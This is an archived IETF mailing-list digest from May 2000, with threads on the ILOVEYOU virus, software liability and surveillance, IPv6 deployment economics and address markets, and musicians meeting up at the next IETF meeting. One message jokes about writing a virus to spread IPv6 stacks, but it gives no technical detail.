for <[EMAIL PROTECTED]>; Sun, 7 May 2000 14:19:36 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from MAUVE.INNOSOFT.COM by MAUVE.INNOSOFT.COM (PMDF V6.1-1 #35243)
id <[EMAIL PROTECTED]> for [EMAIL PROTECTED]; Sun,
07 May 2000 11:19:33 -0800 (PST)
Date: Sun, 07 May 2000 11:07:08 -0800 (PST)
Subject: Re: VIRUS WARNING
In-reply-to: "Your message dated Sun, 07 May 2000 12:06:36 +0200"
<v04210100b53aef547bba@[130.237.150.138]>
To: Jacob Palme <[EMAIL PROTECTED]>
Cc: IETF general mailing list <[EMAIL PROTECTED]>
Message-id: <[EMAIL PROTECTED]>
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
> > but sooner or later folks are going to be held liable for poor engineering
> > or poor implementation of networking software, just like folks today can be
> > held liable for poor engineering or implementation of bridges or buildings.
> This discussion is highly relevant to the IETF list, if we
> discuss the problems and how to overcome them, and avoid
> the never-ending platform war discussions.
> At the IETF meeting in December 1999, the issue was
> discussed whether IETF should support changes in protocols
> which would make it easier to find villains committing
> crime on the net. This was discussed in a large plenary
> meeting, with about a thousand people present. A very large
> majority, something like 95 or 98 percent of those present,
> voted against this. I was one of the few who voted yes.
Well, I was there, and I question the validity of your assessment of what was
going on. While it is true that there was a clear concensus opposed to adding
wiretapping facilities in the RAVEN sense, it was by no means 95-98 percent.
And even more important, this wasn't a vote about mechanisms that would make it
easier to find people who distribute viruses. Wiretapping has little if
anything to do with tracking down people who distribute virusus.
> All of you who voted against designing Internet protocols
> so as to help police finding the villain of criminal
> net-behavour: Have you not changed your mind?
On wiretapping, no I haven't. Nor have I changed my mind about viruss.
But again, one of these has almost nothing to do with the other. The scope
of the question asked was very narrowly drawn. You're reading a lot more
into the question that was there.
> Should we not
> try to find and prosecute the people distributing viruses?
Of course we should. But again, this is a matter of having a useful security
infrastructure on the net, not wiretapping. I suspect that if you asked the
same group of people who voted against wiretapping how they felt about security
infrastructure you'd get a _very_ different response.
> Should we not redesign the Internet, so that this becomes
> easier, for example by doing more logging in the routers,
> so that you can go back and check from where something
> illegal came.
And once again you're switching topics. The issue of tracing traffic is quite
different from wiretapping and quite different from having the tools to track
virus distribution end to end. These are three separate matters.
> Or do you mean that this is impossible,
> because the villains will just get more clever and learn to
> cheat such procedures?
Your message is now so confused that there's no way I can answer this sensibly.
Ned
>From owner-ietf-outbound Sun May 7 15:00:20 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA11321
for [EMAIL PROTECTED]; Sun, 7 May 2000 15:00:03 -0400 (EDT)
Received: from shell5.ba.best.com ([EMAIL PROTECTED] [206.184.139.136])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA11281
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 14:51:25 -0400 (EDT)
Received: (from gds@localhost)
by shell5.ba.best.com (8.9.3/8.9.2/best.sh) id LAA06447;
Sun, 7 May 2000 11:51:27 -0700 (PDT)
Date: Sun, 7 May 2000 11:51:27 -0700 (PDT)
From: Greg Skinner <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: RE: IPv6: Past mistakes repeated?
X-Loop: [EMAIL PROTECTED]
Mathis Jim-AJM005 <[EMAIL PROTECTED]> wrote:
> We need to move forward with IPv6 both by deploying it in
> the "core" and setting a time-frame after which non-IPv4
> compatible addresses will be assigned. Unless there is a
> clear reason to move, no one wants to change software just
> to change. Once IPv6 is in the major backhaul carriers, ISPs
> can role out improved services based on IPv6 which will be
> the real reason end-users upgrade. Seems like a real
> leadership vacuum here...
Hmmm ... seems like the same issues are in effect with regards to
deploying IPv6 in the "core", namely, no one wants to change software
just to change. There don't seem to be overly compelling reasons (yet)
for a significantly large number of end users to switch to IPv6
compliant technology, such that it would spur deployment of IPv6 in the
critical infrastructure they use. Rather, it has spurred deployment
of IPv4/NATv4.
Some of you know that I like to draw parallels between the Internet
and other media. One possible analogy (with US radio broadcasting) is
that IPv4 is to AM as IPv6 is to FM. Licensing of FM stations and the
eventual growth and development of that medium was accomplished through a
variety of means, such as limiting the number of new AM licenses granted,
and the development of programming on FM that became sufficiently compelling
that a marketplace grew for radios that could receive both AM and FM
broadcasts.
This suggests that a possible key to mass deployment of IPv6 could come
from stricter IPv4 address space allocation, but more likely from
development of content reachable *only* via IPv6 address space. This would
hopefully compel the folks who currently want to stick with IPv4/NATv4 to
make/market/purchase IPv6-compliant solutions in order not to be left
behind.
For the record, I don't necessarily think stricter IPv4 address space
allocation is a good idea. But using the US radio broadcasting analogy
again, a good deal of FM licenses were issued to people who wanted to be
broadcasters but had no choice but to go to FM because the FCC would not
issue them an AM license.
--gregbo
>From owner-ietf-outbound Sun May 7 15:10:07 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA11476
for [EMAIL PROTECTED]; Sun, 7 May 2000 15:10:02 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA11446
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 15:06:41 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id PAA22145;
Sun, 7 May 2000 15:06:38 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: John C Klensin <[EMAIL PROTECTED]>
cc: Keith Moore <[EMAIL PROTECTED]>, Jacob Palme <[EMAIL PROTECTED]>,
IETF general mailing list <[EMAIL PROTECTED]>
Subject: Re: VIRUS WARNING
In-reply-to: Your message of "Sun, 07 May 2000 12:43:00 EDT."
<4220640848.957703380@P2>
Date: Sun, 07 May 2000 15:06:38 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> However, in the more general case, if one takes the position
> that, if I build a dangerous-but-useful tool and someone misuses
> it, I should be held responsible, we are going to end up with
> rules against a lot of very useful stuff including, in extreme
> cases, many open source environments.
understood, and agreed that that danger exists.
however I do think there is some culpability on the part of the
software vendor. and from a purely pragmatic perspective, it's a
lot easier for the vendor to make software that is less susceptible
to such things, than it is to get rid of the virus writers.
and if the folks who sell such software would just fix this, we wouldn't
need to care so much about culpability. but I'm not holding my breath
waiting for this to happen.
Keith
>From owner-ietf-outbound Sun May 7 15:30:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA11698
for [EMAIL PROTECTED]; Sun, 7 May 2000 15:30:02 -0400 (EDT)
Received: from bells.cs.ucl.ac.uk (bells.cs.ucl.ac.uk [128.16.5.31])
by ietf.org (8.9.1a/8.9.1a) with SMTP id PAA11633
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 15:25:27 -0400 (EDT)
Received: from sonic.cs.ucl.ac.uk by bells.cs.ucl.ac.uk with local SMTP
id <[EMAIL PROTECTED]>; Sun, 7 May 2000 20:25:22 +0100
to: IETF general mailing list <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING & music at pittsburg?
In-reply-to: Your message of "Sun, 07 May 2000 17:55:19 +0200."
<v0421010eb53b3e500a1b@[130.237.150.138]>
Date: Sun, 07 May 2000 20:25:21 +0100
Message-ID: <[EMAIL PROTECTED]>
From: Jon Crowcroft <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
1/ i think microsoft and the alleged hacker have provived an exxcellent lesson in
active networks
2/ is anyone interested in jamming at the next IETF (folk, jazz, rock, thrash, triphop
etc - you know, primal
scream...) - i can bring a guitar (or bass or flute or something...) but local folks
would
be easier on the wrists!!!
j.
>From owner-ietf-outbound Sun May 7 15:40:10 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA11833
for [EMAIL PROTECTED]; Sun, 7 May 2000 15:40:02 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA11646
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 15:28:24 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id PAA22321;
Sun, 7 May 2000 15:28:20 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: Jacob Palme <[EMAIL PROTECTED]>
cc: IETF general mailing list <[EMAIL PROTECTED]>
Subject: Re: VIRUS WARNING
In-reply-to: Your message of "Sun, 07 May 2000 17:55:19 +0200."
<v0421010eb53b3e500a1b@[130.237.150.138]>
Date: Sun, 07 May 2000 15:28:20 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
Jacob,
Given a choice between reducing crime via more government surveillance
and reducing crime via software that doesn't do stupid things, I'd far
prefer the latter. I don't know of any good reason for a mail reader
to make it so easy to execute code that can have harmful side effects,
but history has provided us with many examples of governments abusing
their power (legitimate or otherwise) to conduct surveillance.
not that this is terribly relevant to the ILOVEYOU virus...the virus is
being transmitted in the clear; the US government (at least) seems
perfectly knowledgable about it and ISPs appear to have been
cooperating with government authorities to help track down the source.
it's not as if the code is a secret, and if I believe the news reports
the authorities are already very close to nabbing the culprit.
(or at least, a suspect...)
Keith
note that the IETF policy is to not develop facilities specifically for
the purpose of supporting government surveillance...this does not
mean that IETF is actively trying to prevent governments from
conducting surveillance, either using facilities developed for other
purposes, or facilities not developed by IETF. it just means that
IETF has decided to concentrate its energies in other areas.
>From owner-ietf-outbound Sun May 7 15:50:25 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA11960
for [EMAIL PROTECTED]; Sun, 7 May 2000 15:50:05 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA11675
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 15:29:38 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id PAA22335;
Sun, 7 May 2000 15:29:32 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: Greg Skinner <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In-reply-to: Your message of "Sun, 07 May 2000 09:49:19 PDT."
<[EMAIL PROTECTED]>
Date: Sun, 07 May 2000 15:29:32 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> > but sooner or later folks are going to be held liable for poor engineering
> > or poor implementation of networking software, just like folks today can be
> > held liable for poor engineering or implementation of bridges or buildings.
>
> I don't see how, as long as the software manufacturers ship the software
> with legal disclaimers, e.g. "We are not responsible for damages ..."
sooner or later that phrase will be recognized as less valuable
than bovine feces.
Keith
>From owner-ietf-outbound Sun May 7 16:40:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA12389
for [EMAIL PROTECTED]; Sun, 7 May 2000 16:40:02 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA12357
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 16:38:40 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id QAA22726;
Sun, 7 May 2000 16:38:40 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: Greg Skinner <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: IPv6: Past mistakes repeated?
In-reply-to: Your message of "Sun, 07 May 2000 11:51:27 PDT."
<[EMAIL PROTECTED]>
Date: Sun, 07 May 2000 16:38:40 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
for a long time the assumption was that IPv6 would be deployed first
in the core, and then in the periphery, of the net. I'm now of the
opinion that IPv6 will be deployed first in the periphery -
both in emerging networks that need large amounts of address space,
and in existing IPv4 nets using 6to4 - and it will be deployed
by folks who have applications that need global address space
(and which perhaps aren't already widely deployed using v4)
and by folks who need to be able to access the new IPv6-only networks.
the emerging networks may be large networks in parts of the world
that are just now getting on the Internet, wireless networks,
and other networks designed to support large-scale data gathering.
(power meters, auto traffic monitors, environmental monitoring,
security systems, etc.)
I think we will have a long period of v4/v6 coexistence, with v4
becoming more and more NATted and popular applications moving
over to v6 based on how poorly they work under NATted IPv4. the
older and better established the application under IPv4, the longer
it will take to move it to v6. SMTP will use IPv4 for a very long
time - not that it won't use IPv6 when available, but for a long time
you'll need to have at least one IPv4-based SMTP server acting as a
mail exchanger for your domain, in order to reliably receive mail.
the core will support v6 when it makes economic sense - i.e. when
top tier ISPs can save enough on bandwidth and support costs (as compared
to tunneling) to make the investment worthwhile. which is not to
say that some major ISPs won't support IPv6 before then.
as for your AM vs. FM analogy - there are a variety of theories about
this, ranging anywhere from artifically making v4 addresses even
more scarce to encouraging a run on v4 address space and making them
scarce that way. but I think the shortage of IPv4 address space
will encourage adoption of IPv6 even without changing allocation policy.
Keith
>From owner-ietf-outbound Sun May 7 17:10:14 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA12666
for [EMAIL PROTECTED]; Sun, 7 May 2000 17:10:02 -0400 (EDT)
Received: from sean.ebone.net (IDENT:[EMAIL PROTECTED] [195.158.227.211])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA12616
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 17:05:00 -0400 (EDT)
Received: by sean.ebone.net (Postfix, from userid 1113)
id 4B5AA875; Sun, 7 May 2000 23:04:56 +0200 (CEST)
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: IPv6: Past mistakes repeated?
Message-Id: <[EMAIL PROTECTED]>
Date: Sun, 7 May 2000 23:04:56 +0200 (CEST)
From: [EMAIL PROTECTED] (Sean Doran)
X-Loop: [EMAIL PROTECTED]
Keith Moore writes:
| the core will support v6 when it makes economic sense - i.e. when
| top tier ISPs can save enough on bandwidth and support costs (as compared
| to tunneling) to make the investment worthwhile.
Perry Metzger had this to say a long time ago (1999 12 03):
>Peter made the absurd statement at DC that he'd be willing to provide
>v6 at some high multiple of the price of v4. Why should we bother? I
>can just pay 5% more for the extra bandwidth encapsulation will
>consume and ignore you until such time as you decide it is in your
>interest to offer native service.
Clearly he agrees with you that the core of the Internet can
effectively run IPv4ever, or at least until there is a clear
advantage to running IPv6.
Peter Lothberg, meanwhile, has proposed a price which would
make it worthwhile for certain ISPs to become dual-protocol.
I'm sure others would be interested. Maybe you guys can convince
the U.S. and European Taxpayers to pay this cost through direct
and indirect government grants and subsidies to ISPs and ISPs'
customers, sort-of like what used to happen in the OSI days?
| as for your AM vs. FM analogy - there are a variety of theories about
| this, ranging anywhere from artifically making v4 addresses even
| more scarce to encouraging a run on v4 address space and making them
| scarce that way.
I would like to see a market develop for IPv4 addresses, along the
lines of the late PIARA work. This would also encourage a
market for routing-table entries, both of which would produce a significant
incentive to dramatically improve upon on-the-fly host-renumbering.
There is no reason to believe a PIARA-style market for IPv6 addresses
and routing-table entries could not also be interesting and perhaps useful.
There is clearly a "price" associated with receiving a TLA allocation,
namely the compliance with a number of IETF-produced rules with respect
to how one conducts one's business. I counterbid $1000 in U.S. currency.
Sean.
P.S. by "routing-table entries", I mean of course, not just the
consumption of memory and CPU resources in forwarding packets
in to large numbers of possible destinations, but also the cost
in various resources (bandwidth, CPU, complexity) of acquiring
and propagating information which may lead to routing-table changes.
>From owner-ietf-outbound Sun May 7 17:40:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA12932
for [EMAIL PROTECTED]; Sun, 7 May 2000 17:40:02 -0400 (EDT)
Received: from mail.perspex.com (IDENT:[EMAIL PROTECTED] [12.5.16.108])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA12887
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 17:32:06 -0400 (EDT)
Received: from localhost (tlilley@localhost) by mail.perspex.com (8.8.7/8.7.3) with
SMTP id VAA22198; Sun, 7 May 2000 21:36:45 GMT
Date: Sun, 7 May 2000 21:36:45 +0000 (/etc/localtime)
From: Tripp Lilley <[EMAIL PROTECTED]>
To: Jon Crowcroft <[EMAIL PROTECTED]>
cc: IETF general mailing list <[EMAIL PROTECTED]>
Subject: Re: music at pittsburgh?
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
On Sun, 7 May 2000, Jon Crowcroft wrote:
> 2/ is anyone interested in jamming at the next IETF (folk, jazz, rock,
> thrash, triphop etc - you know, primal scream...) - i can bring a guitar
> (or bass or flute or something...) but local folks would be easier on
> the wrists!!!
I just got a bodhran I'm itchin' to play...
--
Tripp Lilley * [EMAIL PROTECTED] * http://stargate.sg505.net/~tlilley/
------------------------------------------------------------------------------
"I get a lot of letters like, 'Dear John, I've got a dead alien. What
should I do with it?' One word: barbecue!"
- John Lovitz, A Yellow Pages commercial
>From owner-ietf-outbound Sun May 7 17:50:10 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA13061
for [EMAIL PROTECTED]; Sun, 7 May 2000 17:50:02 -0400 (EDT)
Received: from mail.perspex.com (IDENT:[EMAIL PROTECTED] [12.5.16.108])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA12908
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 17:37:28 -0400 (EDT)
Received: from localhost (tlilley@localhost) by mail.perspex.com (8.8.7/8.7.3) with
SMTP id VAA22211; Sun, 7 May 2000 21:41:56 GMT
Date: Sun, 7 May 2000 21:41:56 +0000 (/etc/localtime)
From: Tripp Lilley <[EMAIL PROTECTED]>
To: Keith Moore <[EMAIL PROTECTED]>
cc: Greg Skinner <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: Re: IPv6: Past mistakes repeated?
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
On Sun, 7 May 2000, Keith Moore wrote:
> the core will support v6 when it makes economic sense - i.e. when
> top tier ISPs can save enough on bandwidth and support costs (as compared
> to tunneling) to make the investment worthwhile. which is not to
> say that some major ISPs won't support IPv6 before then.
We came up with a wacky idea here yesterday at Interop... Why not
accelerate v6 deployment by writing a virus that will upgrade
end-stations' stacks? :)
That will give us the pervasive deployment needed to convince the ISPs to
upgrade the core. The "upgrade" that the virus propagates can do
gratuitous tunneling until it discovers that the infrastructure between it
and the rest of the world has been upgraded.
I mean, let's at least turn this (W)insecure liability into _some_ kind of
asset :)
(yes, any such toy would need to include a raft of known exploits for
various Unices, so we can include them in the "upgrade") :)
--
Tripp Lilley * [EMAIL PROTECTED] * http://stargate.sg505.net/~tlilley/
------------------------------------------------------------------------------
"I get a lot of letters like, 'Dear John, I've got a dead alien. What
should I do with it?' One word: barbecue!"
- John Lovitz, A Yellow Pages commercial
>From owner-ietf-outbound Sun May 7 18:20:19 2000
Received: by ietf.org (8.9.1a/8.9.1a) id SAA13403
for [EMAIL PROTECTED]; Sun, 7 May 2000 18:20:02 -0400 (EDT)
Received: from prue.eim.surrey.ac.uk (IDENT:[EMAIL PROTECTED] [131.227.76.5])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id SAA13337
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 18:14:55 -0400 (EDT)
Received: from petra.ee.surrey.ac.uk ([131.227.88.13] ident=eep1lw)
by prue.eim.surrey.ac.uk with esmtp (Exim 3.03 #1)
id 12oZK5-00032N-00; Sun, 07 May 2000 23:14:49 +0100
Date: Sun, 7 May 2000 23:14:46 +0100 (BST)
From: Lloyd Wood <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
Reply-To: [EMAIL PROTECTED]
To: Keith Moore <[EMAIL PROTECTED]>
cc: Jacob Palme <[EMAIL PROTECTED]>, IETF general mailing list <[EMAIL PROTECTED]>
Subject: Re: VIRUS WARNING
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
Organization: speaking for none
X-url: http://www.ee.surrey.ac.uk/Personal/L.Wood/
X-no-archive: yes
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
On Sun, 7 May 2000, Keith Moore wrote:
> Given a choice between reducing crime via more government surveillance
> and reducing crime via software that doesn't do stupid things, I'd far
> prefer the latter. I don't know of any good reason for a mail reader
> to make it so easy to execute code that can have harmful side effects,
'freedom to innovate'.
In software, anything that can be imagined will be implemented.
Badly.
L.
watching nightmares come true.
<[EMAIL PROTECTED]>PGP<http://www.ee.surrey.ac.uk/Personal/L.Wood/>
>From owner-ietf-outbound Sun May 7 18:30:09 2000
Received: by ietf.org (8.9.1a/8.9.1a) id SAA13483
for [EMAIL PROTECTED]; Sun, 7 May 2000 18:30:02 -0400 (EDT)
Received: from po2.bbn.com (PO2.BBN.COM [192.1.50.36])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id SAA13460
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 18:29:35 -0400 (EDT)
Received: from ti.bbn.com (TC045.BBN.COM [128.33.238.45])
by po2.bbn.com (8.9.1/8.9.1) with SMTP id SAA20902;
Sun, 7 May 2000 18:29:42 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.3 (32)
Date: Sun, 07 May 2000 18:26:20 -0400
To: Tripp Lilley <[EMAIL PROTECTED]>,
Jon Crowcroft <[EMAIL PROTECTED]>
From: Bob Welsh <[EMAIL PROTECTED]>
Subject: Re: music at pittsburgh?
Cc: IETF general mailing list <[EMAIL PROTECTED]>
In-Reply-To: <[EMAIL PROTECTED]
>
References: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
I'll bring some harmonmicas!
At 09:36 PM 5/7/2000 +0000, Tripp Lilley wrote:
>On Sun, 7 May 2000, Jon Crowcroft wrote:
>
>> 2/ is anyone interested in jamming at the next IETF (folk, jazz, rock,
>> thrash, triphop etc - you know, primal scream...) - i can bring a guitar
>> (or bass or flute or something...) but local folks would be easier on
>> the wrists!!!
>
>I just got a bodhran I'm itchin' to play...
>
>--
> Tripp Lilley * [EMAIL PROTECTED] * http://stargate.sg505.net/~tlilley/
>---------------------------------------------------------------------------
---
> "I get a lot of letters like, 'Dear John, I've got a dead alien. What
> should I do with it?' One word: barbecue!"
>
> - John Lovitz, A Yellow Pages commercial
>
>
>From owner-ietf-outbound Sun May 7 21:20:26 2000
Received: by ietf.org (8.9.1a/8.9.1a) id VAA14722
for [EMAIL PROTECTED]; Sun, 7 May 2000 21:20:02 -0400 (EDT)
Received: from boreas.isi.edu (boreas.isi.edu [128.9.160.161])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id VAA14681
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 21:10:12 -0400 (EDT)
Received: (from bmanning@localhost)
by boreas.isi.edu (8.8.7/8.8.6) id SAA22920;
Sun, 7 May 2000 18:10:11 -0700 (PDT)
From: Bill Manning <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
Subject: Re: IPv6: Past mistakes repeated?
To: [EMAIL PROTECTED] (Sean Doran)
Date: Sun, 7 May 2000 18:10:11 -0700 (PDT)
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
In-Reply-To: <[EMAIL PROTECTED]> from "Sean Doran" at May 07,
2000 11:04:56 PM
X-Mailer: ELM [version 2.5 PL2]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Sigh,
Please -NOT- the PIARA again. There is near zero value in the
number/address and very real value in the routing slot. Perhaps it is
best to simply have ebone route filter on the /16 boundaries to drive
home your point. (being cranky this morning)
% I would like to see a market develop for IPv4 addresses, along the
% lines of the late PIARA work. This would also encourage a
% market for routing-table entries, both of which would produce a significant
% incentive to dramatically improve upon on-the-fly host-renumbering.
%
% Sean.
%
% P.S. by "routing-table entries", I mean of course, not just the
% consumption of memory and CPU resources in forwarding packets
% in to large numbers of possible destinations, but also the cost
% in various resources (bandwidth, CPU, complexity) of acquiring
% and propagating information which may lead to routing-table changes.
%
%
--
--bill
>From owner-ietf-outbound Sun May 7 22:00:11 2000
Received: by ietf.org (8.9.1a/8.9.1a) id WAA15976
for [EMAIL PROTECTED]; Sun, 7 May 2000 22:00:02 -0400 (EDT)
Received: from shell.nominum.com (shell.nominum.com [204.152.187.59])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id VAA15934
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 21:56:45 -0400 (EDT)
Received: from nominum.com (shell.nominum.com [204.152.187.59])
by shell.nominum.com (Postfix) with ESMTP
id 9ED4931905; Sun, 7 May 2000 18:56:15 -0700 (PDT)
Message-ID: <[EMAIL PROTECTED]>
Date: Sun, 07 May 2000 18:56:12 -0700
From: "David R. Conrad" <[EMAIL PROTECTED]>
Organization: Nominum, Inc.
X-Mailer: Mozilla 4.72 [en]C-CCK-MCD {Sony} (Win98; U)
X-Accept-Language: en,ja
MIME-Version: 1.0
To: Bill Manning <[EMAIL PROTECTED]>
Cc: Sean Doran <[EMAIL PROTECTED]>, [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: IPv6: Past mistakes repeated?
References: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Heh.
I know someone who wants to offer a class B at seven figures and for class B's
that "sold" for 5 figures. And you say addresses have no value.
Ah, nostalgia. It's so nice to revisit old "discussions"...
Rgds,
-drc
Bill Manning wrote:
>
> Sigh,
> Please -NOT- the PIARA again. There is near zero value in the
> number/address and very real value in the routing slot. Perhaps it is
> best to simply have ebone route filter on the /16 boundaries to drive
> home your point. (being cranky this morning)
>
> % I would like to see a market develop for IPv4 addresses, along the
> % lines of the late PIARA work. This would also encourage a
> % market for routing-table entries, both of which would produce a significant
> % incentive to dramatically improve upon on-the-fly host-renumbering.
> %
> % Sean.
> %
> % P.S. by "routing-table entries", I mean of course, not just the
> % consumption of memory and CPU resources in forwarding packets
> % in to large numbers of possible destinations, but also the cost
> % in various resources (bandwidth, CPU, complexity) of acquiring
> % and propagating information which may lead to routing-table changes.
> %
> %
>
> --
> --bill
>
> -
> This message was passed through [EMAIL PROTECTED], which
> is a sublist of [EMAIL PROTECTED] Not all messages are passed.
> Decisions on what to pass are made solely by Harald Alvestrand.
>From owner-ietf-outbound Mon May 8 00:40:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id AAA18212
for [EMAIL PROTECTED]; Mon, 8 May 2000 00:40:02 -0400 (EDT)
Received: from shell9.ba.best.com ([EMAIL PROTECTED] [206.184.139.140])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id AAA18189
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 00:39:56 -0400 (EDT)
Received: (from bovik@localhost)
by shell9.ba.best.com (8.9.3/8.9.2/best.sh) id VAA08346;
Sun, 7 May 2000 21:39:36 -0700 (PDT)
Date: Sun, 7 May 2000 21:39:36 -0700 (PDT)
From: "James P. Salsman" <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: contest: win valuable Microsoft stock!
X-Loop: [EMAIL PROTECTED]
Keith Moore wrote:
>... I do think there is some culpability on the part of the
> software vendor. and from a purely pragmatic perspective, it's a
> lot easier for the vendor to make software that is less susceptible
> to such things, than it is to get rid of the virus writers.
>
> and if the folks who sell such software would just fix this, we
> wouldn't need to care so much about culpability. but I'm not
> holding my breath waiting for this to happen.
I fully agree and have decided to sponsor a contest to correct
the situation. I will give one share of Microsoft stock to the
first person who posts, to this IETF Discussion list, a draft
shareholder resolution that would, in the opinion of Keith Moore
or his designated alternate, correct the situation if it were
adopted by Microsoft Corporation as we currently know it.
Moreover, as a fellow shareholder, I will second the resolution
in communication with Microsoft's corporate secretariat.
Furthermore, I'll pay Keith or his designate $10 to judge the entries.
I am doing this because I've been unable to communicate successfully
with Microsoft as a customer, shareholder, and erstwhile employee.
This will at least give me a fresh perspective, and with luck might
get something done. If it doesn't, we have legal recourse with the
antitrust remedy proceedings.
Here's your chance to hone your shareholder proposal-writing skills!
Be the first to post a resolution that passes muster with Keith
and win a valuable share of Microsoft stock!
Cheers,
James
--
IMS Q&TI Editor project description: http://www.bovik.org/imsqtied.html
Open-source development: http://sourceforge.net/project/?group_id=3308
>From owner-ietf-outbound Mon May 8 03:00:56 2000
Received: by ietf.org (8.9.1a/8.9.1a) id DAA00702
for [EMAIL PROTECTED]; Mon, 8 May 2000 03:00:02 -0400 (EDT)
